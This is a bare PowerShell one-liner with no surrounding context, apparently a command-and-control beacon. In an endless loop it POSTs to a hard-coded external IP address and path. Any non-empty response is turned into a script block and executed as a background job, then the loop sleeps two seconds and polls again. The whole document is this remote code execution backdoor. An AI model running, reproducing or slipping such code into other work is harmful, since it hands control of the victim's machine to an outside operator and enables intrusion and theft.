while ($true) { try { $r = Invoke-RestMethod -Uri 'http://95.111.232.100:80/30557/df02694c-f670-4910-9fa6-ce9ffc907829' -Method 'POST' -Body '' if ($r -ne '') { Start-Job ([ScriptBlock]::Create($r)) } } catch { break; } Start-Sleep 2 }